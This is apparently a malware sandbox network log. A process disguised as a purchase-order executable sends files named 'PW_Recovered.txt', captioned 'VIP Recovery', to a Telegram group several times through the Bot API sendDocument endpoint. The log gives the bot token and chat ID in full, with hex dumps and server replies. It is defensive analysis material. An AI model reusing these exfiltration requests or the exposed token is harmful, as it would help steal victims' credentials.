                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17209,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354946,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            26192.168.2.449876149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:47 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd269d6eebb803
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:15:47 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 39 64 36 65 65 62 62 38 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd269d6eebb803Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:48 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:48 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:48 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17211,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354948,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            27192.168.2.449882149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:49 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd273af9796484
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:15:49 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 37 33 61 66 39 37 39 36 34 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd273af9796484Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:50 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:50 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 530
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:50 UTC530INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17213,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354950,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            28192.168.2.449888149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:51 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd27d1a9bd81ef
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:15:51 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 37 64 31 61 39 62 64 38 31 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd27d1a9bd81efContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:52 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:52 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:52 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17215,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354952,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            29192.168.2.449894149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:53 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd2a320255e51f
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:15:53 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 61 33 32 30 32 35 35 65 35 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd2a320255e51fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:54 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:54 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:54 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17217,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354954,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            30192.168.2.449899149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:55 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd2caa9038df06
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:15:55 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 63 61 61 39 30 33 38 64 66 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd2caa9038df06Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:56 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:56 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 530
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:56 UTC530INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17219,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354956,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            31192.168.2.449902149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:57 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd2d63b3185ce7
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:15:57 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 64 36 33 62 33 31 38 35 63 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd2d63b3185ce7Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:58 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:58 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:58 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17221,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354958,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            32192.168.2.449908149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:59 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd2fc9ba88ec0f
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:15:59 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 63 39 62 61 38 38 65 63 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd2fc9ba88ec0fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:16:00 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:59 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
